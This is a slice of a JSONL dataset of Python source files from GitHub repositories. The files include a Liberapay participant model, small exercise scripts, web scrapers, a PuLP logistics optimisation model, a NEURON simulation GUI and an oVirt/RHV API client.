dict(platform=platform, user_id=user_id, owner=other.id)\n self.add_event(cursor, 'take-over', payload)\n\n if old_tips:\n self.notify_patrons(elsewhere, tips=old_tips)\n\n self.update_avatar()\n\n # Note: the order matters here, receiving needs to be updated before giving\n self.update_receiving()\n self.update_giving()\n\n def delete_elsewhere(self, platform, user_id):\n \"\"\"Deletes account elsewhere unless the user would not be able\n to log in anymore.\n \"\"\"\n user_id = str(user_id)\n with self.db.get_cursor() as c:\n c.one(\"\"\"\n DELETE FROM elsewhere\n WHERE participant=%s\n AND platform=%s\n AND user_id=%s\n RETURNING participant\n \"\"\", (self.id, platform, user_id), default=NonexistingElsewhere)\n self.add_event(c, 'delete_elsewhere', dict(platform=platform, user_id=user_id))\n self.update_avatar()\n\n def to_dict(self, details=False, inquirer=None):\n output = { 'id': self.id\n , 'username': self.username\n , 'avatar': self.avatar_url\n , 'kind': self.kind\n }\n\n if not details:\n return output\n\n # Key: npatrons\n output['npatrons'] = self.npatrons\n\n # Key: goal\n # Values:\n # undefined - user is not here to receive tips, but will generally regift them\n # null - user has no funding goal\n # 3.00 - user wishes to receive at least this amount\n if self.goal != 0:\n if self.goal > 0:\n goal = str(self.goal)\n else:\n goal = None\n output['goal'] = goal\n\n # Key: receiving\n # Values:\n # null - user is receiving anonymously\n # 3.00 - user receives this amount in tips\n if not self.hide_receiving:\n receiving = str(self.receiving)\n else:\n receiving = None\n output['receiving'] = receiving\n\n # Key: giving\n # Values:\n # null - user is giving anonymously\n # 3.00 - user gives this amount in tips\n if not self.hide_giving:\n giving = str(self.giving)\n else:\n giving = None\n output['giving'] = giving\n\n # Key: my_tip\n # Values:\n # undefined - user is not authenticated\n # \"self\" - user == participant\n # null - user has never tipped this person\n # 0.00 - user used to tip this person but now doesn't\n # 3.00 - user tips this person this amount\n if inquirer:\n if inquirer.id == self.id:\n my_tip = 'self'\n else:\n my_tip = inquirer.get_tip_to(self)['amount']\n output['my_tip'] = str(my_tip)\n\n # Key: elsewhere\n accounts = self.get_accounts_elsewhere()\n elsewhere = output['elsewhere'] = {}\n for platform, account in accounts.items():\n fields = ['id', 'user_id', 'user_name']\n elsewhere[platform] = {k: getattr(account, k, None) for k in fields}\n\n return output\n\n def path(self, path):\n return '/%s/%s' % (self.username, path)\n\n @property\n def is_person(self):\n return self.kind in ('individual', 'organization')\n\n def controls(self, other):\n return isinstance(other, Participant) and (\n self.id == other.id or\n other.kind == 'group' and self.member_of(other)\n )\n\n\nclass NeedConfirmation(Exception):\n \"\"\"Represent the case where we need user confirmation during a merge.\n\n This is used in the workflow for merging one participant into another.\n\n \"\"\"\n\n def __init__(self, a, c):\n self.other_is_a_real_participant = a\n self.we_already_have_that_kind_of_account = c\n self._all = (a, c)\n\n def __repr__(self):\n return \"\" % self._all\n __str__ = __repr__\n\n def __eq__(self, other):\n return self._all == other._all\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __bool__(self):\n return any(self._all)\n __nonzero__ = __bool__\n","repo_name":"amir17688/google_data_p2","sub_path":"85245_participant.py_C__Users_user_Desktop_data_2_data_google_data_liberapay_liberapay.com_.py","file_name":"85245_participant.py_C__Users_user_Desktop_data_2_data_google_data_liberapay_liberapay.com_.py","file_ext":"py","file_size_in_byte":59054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29346253119","text":"#Cálculo del dígito verificador de un rut\nrut = input(\"Ingrese un número de rut: \")\n\n# Inicializar variables\nfactor = 2\nsuma = 0\n\n# Calcular la suma ponderada\nfor i in range(len(rut)-1, -1, -1):\n suma += int(rut[i]) * factor\n factor = (factor + 1) % 8 or 2\n\n# Calcular el dígito verificador\ndv = (11 - (suma % 11)) % 11\n\nprint(\"dv =\", dv)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_cd99fa584fb597c0ef306cb48673eb73.py","file_name":"hito1_ej5_cd99fa584fb597c0ef306cb48673eb73.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9122475233","text":"import math\nfrom models.direction import *\nclass Word:\n def __init__(self, dir, start,end):\n self.value = []\n self.start = start\n self.end = end\n self.direction = dir\n self.length = int(math.fabs((start.i - end.i) + (start.j - end.j)) +1)\n self.crossword_at_with = {}#dict()\n\n # initialize the value with 1 values\n for i in range(self.length):\n self.value.append('1')\n\n def add_crossword(self, at, newWord ):\n if at not in self.crossword_at_with:\n self.crossword_at_with[at] = newWord\n\n def set_value(self, newValue):\n self.value = []\n for c in newValue:\n self.value.append(c)\n\n def get_nb_conflicts(self):\n nb_conflicts = 0\n\n for at , word in self.crossword_at_with.items():\n\n if self.direction == Direction.Across:\n k1 = self.start.j\n k2 = word.start.i\n if self.value:\n if self.value[at.j - k1] != word.value[at.i-k2]:\n nb_conflicts+=1\n else:\n k1 = self.start.i\n k2 = word.start.j\n if self.value:\n if self.value[at.i - k1] != word.value[at.j - k2]:\n nb_conflicts+=1\n return nb_conflicts\n\n def get_indexes_with(self,at , cross):\n if self.direction == Direction.Across:\n index1 = at.j - self.start.j\n index2 = at.i - cross.start.i\n return index1,index2\n else:\n index1 = at.i - self.start.i\n index2 = at.j - cross.start.j\n return index1,index2\n\n def is_no_letters_at_intersects(self):\n for at, cross in self.crossword_at_with.items():\n i1,i2 = self.get_indexes_with(at,cross)\n if cross.value[i2] != '1':\n return False\n return True\n def get_letters_at_intersects(self):\n d = dict()\n for at, cross in self.crossword_at_with.items():\n i1,i2 = self.get_indexes_with(at,cross)\n if cross.value[i2] != '1':\n d[i1] = cross.value[i2]\n return d\n\n def __eq__(self, other):\n return self.start.i == other.start.i and self.start.j == other.start.j and self.end.i == other.end.i and self.end.j == other.end.j\n\n def print(self):\n print(\"Word start at (\" + str(self.start.i) + \",\" + str(self.start.j) + \") and end at (\" + str(self.end.i) + \",\" + str(self.end.j) + \")\")\n","repo_name":"tamer-abdulghani/crossword-composer","sub_path":"models/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43332119900","text":"flag = False\nwhile True:\n N = int(input())\n if N == 0: break\n arr = [str(eval(raw_input())) for _ in range(N)]\n\n if flag: print('')\n flag = True\n\n max_len = max(map(len, arr))\n\n num_cols = 51//(max_len+1)\n s = ''\n for i in range(len(arr)):\n s += ' ' * (max_len - len(arr[i])) + arr[i]\n if i == len(arr)-1: continue\n if i % num_cols == num_cols-1: s += '\\n'\n else: s += ' '\n print(s)\n \n","repo_name":"Tetragonal/kattis-solutions","sub_path":"solved/4-5/mathworksheet.py","file_name":"mathworksheet.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2597869475","text":"import random\nnum = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nch = (random.sample(num, 4))\nchstr = ''.join(ch)\nwhile True:\n val = input()\n if chstr == val:\n print('OK')\n break\n if len(val) != 4:\n print('input 4 numbers.')\n continue\n answer = ''\n for i in range(4):\n if (chstr[i] == val[i]):\n answer += chstr[i]\n else:\n answer += 'X'\n print('->' + answer)\n","repo_name":"tomossy/python","sub_path":"test/whiletest.py","file_name":"whiletest.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14378552378","text":"binary = [int(x) for x in list(input())]\nwhile len(binary) % 3 != 0:\n binary.insert(0, 0)\nans = []\nfor i in range(0, len(binary), 3):\n ta = 0\n for j in range(i, i + 3):\n # print(\"ta = \", ta, \" j = \", j)\n k = binary[j] * int(pow(2, 2 - j % 3))\n # print(binary[j])\n # print(\"k = \", k)\n # print(\"K = \", k)\n ta += k\n ans.append(ta)\n # print(\"ans = \", ans)\nprint(int(\"\".join(str(x) for x in ans)))","repo_name":"k0syan/Kattis","sub_path":"oktalni.py","file_name":"oktalni.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70980400248","text":"\"\"\"\nFile: encrypt.py\nEncypts an input string of lowercase letters and prints\nthe result. The other input is the distance value.\n\"\"\"\n\ndef encrypt(clear_text, distance):\n\tcode = \"\"\n\tfor ch in clear_text:\n\t\tordValue = ord(ch)\n\t\tcipherValue = ordValue + distance\n\t\tif cipherValue > ord('z'):\n\t\t\tcipherValue = ord('a') + distance - \\\n\t\t\t\t\t\t (ord('z') - ordValue + 1)\n\t\tcode += chr(cipherValue)\n\treturn (code)\n\t\n\ndef main():\n\tplainText =input(\"Enter a one-word, lowercase message: \")\n\toffset = int(input(\"Enter the distance value: \"))\n\t\n\tresult = encrypt(plainText, offset)\n\tprint(\"Cleartext: {:5s}. Offset: {:2d} Ciphertext: {:5s}\".format(plainText, offset, result))\n\t\n\t\n\t\n\nmain()\n","repo_name":"asuz66/Hactoberfest2020","sub_path":"Python/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16162458092","text":"class Solution:\n def biggest_unique_substring(self, input: str) -> str:\n\n from typing import Set, Dict\n \n dict_res = Dict()\n res = Set()\n before,after = 0 \n max_substring = \"\"\n for before in range(len(input)):\n\n if input[before] not in dict_res.keys():\n dict_res[input[before]] = before\n max_substring = \"\".join(dict_res.keys())\n print (max_substring)\n else:\n index = dict_res[input[before]]\n \n\n\n \n\n\n\n return None\n\n\n\n\nif __name__ == '__main__':\n s = Solution()\n print (s.biggest_unique_substring('abcabcda'))","repo_name":"singhujjwal/python","sub_path":"interview_questions/biggest_unique_substring.py","file_name":"biggest_unique_substring.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2410650919","text":"import pandas as pd\r\nimport requests,re\r\nfrom IPython.display import display\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ncustomer_data_file = 'output_com03.pkl'\r\n\r\nhead = {'User-agent': 'Mozilla/5.0 (Windows 98) AppleWebKit/537.36 '\r\n '(KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38',\r\n 'Referer': 'http://www.deathmetal.org/'}\r\n\r\ncustomers = pd.read_pickle(customer_data_file)\r\njogos_df = pd.DataFrame(customers)\r\n\r\nfor jogos in jogos_df:\r\n\r\n url_alvo = \"https://store.playstation.com/pt-br/product/\"+jogos_df[jogos]['id']\r\n print('Nome :' + jogos + ' Url :'+str(url_alvo)+' Valor Atual : '+ str(jogos_df[jogos]['basePrice']) )\r\n try:\r\n pagina = requests.get(url_alvo, headers=head)\r\n print(pagina.status_code)\r\n except Exception:\r\n print('error')\r\n soup = BeautifulSoup(pagina.content, 'html.parser')\r\n\r\n valor_final = soup.find(\"span\", {\"data-qa\": \"mfeCtaMain#offer0#finalPrice\"})\r\n jogos_df[jogos]['discountedPrice'] = valor_final\r\n print(valor_final)\r\n\r\njogos_df.to_pickle('output_com04.pkl')\r\njogos_df.to_excel('output_com04.xlsx', sheet_name='Jogos')\r\n","repo_name":"FabriNeves/WebScraping_PSN","sub_path":"UpdateValor.py","file_name":"UpdateValor.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72748782010","text":"# Import PuLP modeler functions\nfrom pulp import *\n\n# Create the 'prob' variable to contain the problem data\nprob = LpProblem(\"BC Transportation Problem 2\",LpMinimize)\n\n\n########################### Set the constants here ###############################################\n\n\nproducts = [\"Regular\",\"GreenOnion\",\"PartyMix\"]\ndist_centres = [\"Kingman\",\"LasCruces\",\"Provo\",\"Victorville\"]\n# sites = [\"Yuma\",'Fresno','Tucson','Pomona','SantaFe','Flagstaff','LasVegas','StGeorge']\nsites = ['Tucson','Pomona']\ncustomers = ['SLC','Albuquerque','Phoenix','SanDiego','LosAngeles','Tucson']\n\nsite_dist_gas = 0.15\ndist_cust_gas = 0.08\n\nMATERIAL_COST = [[9,10,15],\n [11,7,14]]\n\nsite_dist_distance = [[308,276,732,471], [291,732,617,56]]\n\n\ndist_cust_distance = [[523,469,195,380,319,308],\n [823,276,388,695,760,276],\n [45,555,619,707,645,732],\n [607,705,358,146,84,471]]\n\n\nfixed_cost = {'Kingman':6000,'LasCruces':5000,'Provo':8000,'Victorville':9000}\n\nvariable_cost = {'Kingman':50,'LasCruces':30,'Provo':60,'Victorville':70}\n\n\n############################## Set objective function here #######################################\n\n\nsite_dist_choices = LpVariable.dicts(\"Quantity\",(sites,dist_centres,products),0,cat=LpInteger)\n\ndist_cust_choices = LpVariable.dicts(\"Quantity\",(dist_centres,customers,products),0,cat=LpInteger)\n\ny_dist_cust = LpVariable.dicts(\"Produce or not\",(dist_centres,customers,products),0,1,cat=LpInteger)\n\ny_dist = LpVariable.dicts(\"Construct or not\",(dist_centres),0,1,cat=LpInteger)\n\n# Transportation costs from site to distribution centre\ndef get_site_dist_objective(site_dist_distance, site_dist_gas, site_dist_choices):\n obj = 0\n for site_index in range(len(sites)):\n for dist_index in range(len(dist_centres)):\n for product in products: \n obj += (site_dist_distance[site_index][dist_index] * site_dist_gas) * site_dist_choices[sites[site_index]][dist_centres[dist_index]][product]\n return obj\n\n\n# Transportation costs from distribution centre to customer and adding the variable processing costs\ndef get_dist_cust_objective(dist_cust_distance, dist_cust_gas, dist_cust_choices):\n obj = 0\n for dist_index in range(len(dist_centres)):\n for cust_index in range(len(customers)):\n for product in products: \n obj += (dist_cust_distance[dist_index][cust_index] * dist_cust_gas + variable_cost[dist_centres[dist_index]]) * dist_cust_choices[dist_centres[dist_index]][customers[cust_index]][product]\n return obj\n\ndef getProductMix(MATERIAL_COST):\n regular_ratio = (0.7,0.2,0.1)\n green_onion_ratio = (0.3,0.15,0.55)\n party_mix_ratio = (0.2,0.5,0.3)\n product_mix = []\n \n for site in MATERIAL_COST:\n regular = sum([regular_ratio[i]*site[i] for i in range(len(site))])\n green_onion = sum([green_onion_ratio[i]*site[i] for i in range(len(site))])\n party_mix = sum([party_mix_ratio[i]*site[i] for i in range(len(site))])\n product_mix.append([regular,green_onion,party_mix])\n return product_mix\n\nobj = get_site_dist_objective(site_dist_distance, site_dist_gas, site_dist_choices) + \\\n get_dist_cust_objective(dist_cust_distance, dist_cust_gas, dist_cust_choices)\n\n# Fixed cost\nfor dist_centre in y_dist:\n obj += y_dist[dist_centre] * fixed_cost[dist_centre]\n\n# Cost of purchasing raw materials for processing at site\nproduct_mix = getProductMix(MATERIAL_COST)\n\nfor site_index in range(len(sites)):\n for prod_index in range(len(products)):\n obj += product_mix[site_index][prod_index] * sum([site_dist_choices[sites[site_index]][dist_centre][products[prod_index]] for dist_centre in dist_centres])\n\nprob += obj, \"Total Cost\"\n\n\n########################## Define constraints here #########################################\n\n\n# Minimum allowable amount of products handled\nminimum_products = {'Kingman':1000,'LasCruces':1000,'Provo':2000,'Victorville':2000}\n\nfor dist_centre in dist_centres:\n product_total = 0\n for site in sites:\n product_total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += product_total >= minimum_products[dist_centre], (dist_centre+\"_Minimum allowable amount of products constraint\")\n\n# Maximum allowable amount of products handled\nmaximum_products = {'Kingman':15000,'LasCruces':12000,'Provo':18000,'Victorville':20000}\n\nfor dist_centre in dist_centres:\n product_total = 0\n for site in sites:\n product_total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += product_total <= maximum_products[dist_centre], (dist_centre+\"_Maximum allowable amount of products constraint\")\n\n# Maximum 50% fraction from site to distibution centre constraint\nsite_to_dist_ratio = 0.5\n\nfor site in sites:\n total = 0\n for dist_centre in dist_centres:\n total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n \n for dist_centre in dist_centres:\n site_to_dist_supply = sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += (site_to_dist_ratio * total) - site_to_dist_supply >= 0, (site+\"_to_\"+dist_centre+\"_fraction_constraint\")\n\n# Demand constraint\ndemand = [[1300,900,1700],\n [1400,1100,1700],\n [1200,800,1800],\n [1900,1200,2200],\n [1900,1400,2300],\n [1500,1000,1400]]\n\nfor cust_index in range(len(customers)):\n for prod_index in range(len(products)):\n demand_constraint = 0\n for dist_centre in dist_centres:\n demand_constraint += dist_cust_choices[dist_centre][customers[cust_index]][products[prod_index]]\n prob += demand_constraint >= demand[cust_index][prod_index], (customers[cust_index] + \"'s_\" + products[prod_index] + \" demand constraint\")\n\n\n# Maximum 60% fraction from distibution centre to customer constraint\ndist_to_cust_ratio = 0.6\n\nfor dist_centre in dist_centres:\n count = 0\n for customer in customers:\n dist_to_cust_supply = sum([dist_cust_choices[dist_centre][customer][product] for product in dist_cust_choices[dist_centre][customer]])\n cust_demand = sum(demand[count])\n count += 1\n prob += dist_to_cust_supply <= 0.6 * cust_demand, (dist_centre + \"_to_\" + customer + \"_max_fraction_constraint\")\n\n\n# Maximum one product from distribution centre to customer constraint\n\nfor dist_centre in dist_centres:\n for customer in customers:\n prob += sum([y_dist_cust[dist_centre][customer][product] for product in y_dist_cust[dist_centre][customer]]) == 1, (dist_centre + \"_to_\" + customer + \" one product constraint\")\n\n\n# Maximum one product logical constraint \n\nfor dist_centre in dist_centres:\n for customer in customers:\n for product in products:\n prob += dist_cust_choices[dist_centre][customer][product] <= y_dist_cust[dist_centre][customer][product] * maximum_products[dist_centre], \"\"\n\n# non-working distribution logical constraint\n\nfor dist_centre in dist_centres:\n product_total = 0\n supply_total = 0\n for site in sites:\n product_total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n\n for customer in customers:\n supply_total += sum([dist_cust_choices[dist_centre][customer][product] for product in dist_cust_choices[dist_centre][customer]])\n\n prob += product_total <= y_dist[dist_centre] * maximum_products[dist_centre], \"\"\n prob += supply_total <= y_dist[dist_centre] * maximum_products[dist_centre], \"\"\n\n\n# supply and demand logical constraint for distribution centre\n\nfor dist_centre in dist_centres: \n for product in products:\n total_outgoing_product = 0\n total_incoming_product = 0\n for customer in customers:\n total_outgoing_product += dist_cust_choices[dist_centre][customer][product]\n\n for site in sites:\n total_incoming_product += site_dist_choices[site][dist_centre][product]\n\n prob += total_incoming_product == total_outgoing_product, \"\"\n\n\n\nprob.solve()\nprint(\"Status:\", LpStatus[prob.status])\nfor v in prob.variables():\n if v.varValue != 0:\n print(v.name, \"=\", v.varValue)\n\nprint(\"Total cost:\", value(prob.objective))\n\nprint(\"===============================\")\n\nend_sum = 0\nfor site in sites:\n for dist_centre in dist_centres:\n for product in products:\n end_sum += site_dist_choices[site][dist_centre][product].varValue\n\nprint(\"Total outgoing products from site:\",end_sum)\n\ndist_to_cust_sum = 0\n\nfor dist_centre in dist_centres:\n for customer in customers:\n for product in products:\n dist_to_cust_sum += dist_cust_choices[dist_centre][customer][product].varValue\n\nprint(\"Total outgoing products from distribution centre\",dist_to_cust_sum)","repo_name":"gnosis-agora/operations-research-project","sub_path":"IE4210 model2.py","file_name":"IE4210 model2.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46003803734","text":"from matplotlib import pyplot as plt\nfrom ais_model import *\nfrom neuron import h, gui\n\ndef simulation_gui():\n # Add cell to each of the components\n #Contorl Panel\n sim_control = h.HBox()\n sim_control.intercept(1)\n h.nrncontrolmenu()\n # attach_current_clamp(cell)\n h.xpanel('TEST')\n h.xlabel('Choose a simulation to run')\n h.xbutton('Spike Protocol',(sim.voltage_trace, cell))\n h.xbutton('Rheobase Protocol',(sim.rheobase_protocol, cell))\n h.xbutton('Examine AIS change effect on cell Rheobase', (sim.plot_ais_plasticity_change, cell))\n h.xpanel()\n #Output panel\n g = h.Graph()\n g.addvar('soma(0.5).v', cell.soma(0.5)._ref_v)\n g.addvar('AIS(0.5).v', cell.AIS(0.5)._ref_v)\n g.size(0, 1000, -90, 90)\n h.graphList[0].append(g)\n h.MenuExplore()\n sim_control.intercept(0)\n sim_control.map()\n input()\n\nif __name__ == \"__main__\":\n cell = laminaNeuron()\n cell.set_recording()\n sim = Simulation()\n simulation_gui()","repo_name":"lauramedlock/NetPyNE_Project","sub_path":"cells/ais_main.py","file_name":"ais_main.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37076917638","text":"#클릭은 url주소를 찾아내서 urlopen함수를 사용하면 됨\r\n\r\nimport urllib.request as req\r\nfrom bs4 import BeautifulSoup #pip install beautifulsoup4\r\n\r\nyour_champ = input(\"당신의 챔프>>\")\r\nheaders = req.Request(\"https://www.op.gg/champion/statistics\", headers={\"Accept-Language\":\"ko-KR\"}) #한글로 된 html을 그대로 가져오기\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\n\r\nchamp_list = soup.select(\"div.champion-index__champion-list > div\")\r\nfor i in champ_list:\r\n if i.attrs[\"data-champion-name\"] == your_champ:\r\n a = i.select_one(\"a\")\r\n champ_url = \"https://www.op.gg\" + a.attrs[\"href\"]\r\n break\r\nheaders = req.Request(champ_url, headers={\"Accept-Language\":\"ko-KR\"}) #한글로 된 html을 그대로 가져오기\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\ncounter_tab = soup.select_one(\"li.champion-stats-menu__list__item.champion-stats-menu__list__item--red.tabHeader > a\")\r\n\r\ncounter_url = \"https://www.op.gg\" + counter_tab.attrs[\"href\"]\r\nheaders = req.Request(counter_url, headers={\"Accept-Language\":\"ko-KR\"}) #한글로 된 html을 그대로 가져오기\r\ncode = req.urlopen(headers)\r\nsoup = BeautifulSoup(code, \"html.parser\")\r\ncounter = soup.select(\"div.champion-matchup-list__champion > span:nth-child(2)\")\r\nfor i in counter:\r\n print(i.string)\r\n","repo_name":"mjkimcs/portfolio","sub_path":"웹스크래핑/11d_ 속도향상_LOL게임.py","file_name":"11d_ 속도향상_LOL게임.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"69906153208","text":"\"\"\"\nClasses that gets data from engine API\n\"\"\"\n\nimport requests\n\nfrom helpers.config import api as api_config\n\n\nclass RhvmApi:\n \"\"\"\n Class that processes API calls\n \"\"\"\n\n # dict with values for sections api, ssh and other\n config = None\n # part of url for api (with / in the end)\n api_url = \"\"\n # server http adress (without / in the end)\n server_url = \"\"\n\n def __init__(self, config, server):\n self.config = config\n self.server_url = \"https://%s\" % server\n\n self.api_url = self.config[\"api\"][\"URL\"]\n if self.api_url[-1] != \"/\":\n self.api_url += \"/\"\n if self.api_url[0] != \"/\":\n self.api_url = \"/\" + self.api_url\n\n requests.packages.urllib3.disable_warnings()\n\n def get_api_url_part(self, url_part=\"\"):\n \"\"\"\n Get proper address as url part for sel.get()\n\n Arguments:\n url_part (str): url address part to process\n Returns: (str) url part for self.get()\n \"\"\"\n return url_part.replace(self.api_url, \"\")\n\n def get(self, url_part=\"\", data=None):\n \"\"\"\n Get data from api\n\n Arguments:\n url_part (str): url address part to call (after adress to api e.g.\n /ovirt-engine/api)\n Returns: (dict) data from api call\n Raises: (ApiException) In case api call was not sucessfull\n \"\"\"\n url = self.server_url + self.api_url + url_part\n api_result = requests.get(\n url,\n auth=(self.config[\"api\"][\"USER\"], self.config[\"api\"][\"PASSWORD\"]),\n data=data,\n headers={\"Accept\": \"application/json\", \"Prefer\": \"persistent-auth\"},\n verify=False,\n )\n try:\n return api_result.json()\n except Exception:\n raise ApiException(\"GET {}: {}\".format(url, str(api_result)))\n\n\nclass ApiData:\n \"\"\"\n Class that processes data from API\n \"\"\"\n\n config = None\n server = \"\"\n\n def __init__(self, config, server):\n self.config = config\n self.server = server\n self.api = RhvmApi(config, server)\n\n def get_link(self, links, name):\n \"\"\"\n Get proper url from links in api data\n\n Arguments:\n links (list): links in api data\n name (str): rel name of the link\n Returns: (str/None) found url for the link, None otherwise\n \"\"\"\n for link in links:\n if \"rel\" in link and link[\"rel\"] == name:\n return self.api.get_api_url_part(link[\"href\"])\n return None\n\n def set_authentication(self, data):\n \"\"\"\n Set authentication values for provider\n\n Arguments:\n data (dict): data where the authentication should be set\n \"\"\"\n if \"requires_authentication\" in data:\n data[\"authentication\"] = {\n key: data.get(key, \"\") for key in api_config.EXT_PROVIDER_AUTH_KEYS\n }\n\n def get_externalprovider_data(self, links):\n \"\"\"\n Get network external providers from links in api data\n\n Arguments:\n links (list): links in api data\n Returns: (list) list of network providers\n \"\"\"\n providers = []\n ext_link = self.get_link(links, \"externalnetworkproviders\")\n if ext_link:\n data_provider = self.api.get(ext_link)\n if \"external_provider\" in data_provider:\n for provider in data_provider[\"external_provider\"]:\n self.set_authentication(provider)\n providers.append(provider)\n return providers\n\n def get_cluster_data(self):\n \"\"\"\n Get clusters api data\n\n Returns: (list) clusters data\n \"\"\"\n clusters = []\n data_clusters = self.api.get(\"clusters\")\n for cluster in data_clusters[\"cluster\"]:\n cluster[\"version\"] = \"{}.{}\".format(\n cluster[\"version\"][\"major\"], cluster[\"version\"][\"minor\"]\n )\n if \"cpu\" in cluster:\n cluster[\"cpu_type\"] = cluster[\"cpu\"][\"type\"]\n else:\n cluster[\"cpu_type\"] = \"{{ cpu_type }}\"\n cluster[\"external_providers\"] = self.get_externalprovider_data(\n cluster[\"link\"]\n )\n data_macpool = self.api.get(\n self.api.get_api_url_part(cluster[\"mac_pool\"][\"href\"])\n )\n cluster[\"mac_pool_name\"] = data_macpool[\"name\"]\n\n clusters.append(cluster)\n\n return clusters\n\n def get_host_data(self):\n \"\"\"\n Get hosts api data\n\n Returns: (list) hosts data\n \"\"\"\n hosts = []\n data_hosts = self.api.get(\"hosts\")\n for host in data_hosts.get(\"host\", []):\n try:\n host[\"os_version\"] = \"{os_type}-{major_ver}.{minor_ver}\".format(\n os_type=host[\"os\"][\"type\"],\n major_ver=host[\"os\"][\"version\"][\"major\"],\n minor_ver=host[\"os\"][\"version\"].get(\"minor\", \"x\"),\n )\n except KeyError:\n host[\"os_version\"] = \"\"\n data_cluster = self.api.get(\n self.api.get_api_url_part(host[\"cluster\"][\"href\"])\n )\n host[\"cluster\"] = data_cluster[\"name\"]\n hosts.append(host)\n\n return hosts\n\n def get_storage_data(self):\n \"\"\"\n Get storages api data\n\n Returns: (list) storages data\n \"\"\"\n storages = []\n data_storages = self.api.get(\"storagedomains\")\n for storage in data_storages.get(\"storage_domain\", []):\n storage_ad = storage[\"storage\"]\n if storage[\"type\"] == \"image\":\n continue\n if storage_ad[\"type\"] == \"nfs\":\n storage[\"nfs\"] = storage_ad\n elif storage_ad[\"type\"] == \"iscsi\":\n luns = storage_ad[\"volume_group\"][\"logical_units\"]\n if not isinstance(luns[\"logical_unit\"], list):\n luns = [luns[\"logical_unit\"]]\n else:\n luns = luns[\"logical_unit\"]\n for lun in luns:\n if \"iscsi\" not in storage:\n lun_id = lun[\"id\"]\n lun.pop(\"id\")\n storage[\"iscsi\"] = lun\n storage[\"iscsi\"][\"luns\"] = [{\"value\": lun_id}]\n else:\n storage[\"iscsi\"][\"luns\"].append({\"value\": lun_id})\n storage[\"state\"] = \"present\" # for testing is enough\n if storage[\"type\"] != \"data\":\n storage[\"domain_function\"] = {\"value\": storage[\"type\"]}\n storages.append(storage)\n\n return storages\n\n def get_macpool_data(self):\n \"\"\"\n Get mac pools api data\n\n Returns: (list) mac pools data\n \"\"\"\n macpools = []\n data_macpools = self.api.get(\"macpools\")\n for macpool in data_macpools[\"mac_pool\"]:\n macpool_pom = {\"name\": macpool[\"name\"], \"ranges\": []}\n for mac_range in macpool[\"ranges\"][\"range\"]:\n macpool_pom[\"ranges\"].append(mac_range[\"from\"] + \",\" + mac_range[\"to\"])\n macpools.append(macpool_pom)\n return macpools\n\n def get_ext_provider_data(self):\n \"\"\"\n Get data external providers api data (from helpers.config.api)\n\n Returns: (list) external providers data\n \"\"\"\n providers = []\n for conf_item in api_config.EXT_PROVIDERS:\n data_providers = self.api.get(conf_item[\"url\"])\n if data_providers:\n for provider in data_providers[conf_item[\"variable\"]]:\n provider[\"type\"] = conf_item[\"type\"]\n provider[\"state\"] = \"present\" # for testing is enough\n self.set_authentication(provider)\n providers.append(provider)\n\n return providers\n\n def get_vm_data(self):\n \"\"\"\n Get VMs api data\n\n Returns: (list) VMs data\n \"\"\"\n vms = []\n data_vms = self.api.get(\"vms\")\n for vm in data_vms.get(\"vm\", []):\n vm[\"tag\"] = \"\"\n tags_link = self.get_link(vm[\"link\"], \"tags\")\n if tags_link:\n data_tag = self.api.get(tags_link)\n if data_tag:\n tags = []\n for tag in data_tag[\"tag\"]:\n tags.append(tag[\"name\"])\n vm[\"tag\"] = \",\".join(tags)\n vms.append(vm)\n\n return vms\n\n def get_domain_data(self):\n \"\"\"\n Get user's domains api data\n\n Returns: (list) domains data\n \"\"\"\n domains = []\n data_domains = self.api.get(\"domains\")\n for domain in data_domains[\"domain\"]:\n domain[\"groups\"] = []\n group_link = self.get_link(domain[\"link\"], \"groups\")\n data_groups = self.api.get(group_link)\n if data_groups:\n for group in data_groups[\"group\"]:\n domain[\"groups\"].append(\n {\n \"name\": group[\"name\"],\n \"authz_name\": domain[\"name\"],\n \"users\": [],\n }\n )\n\n 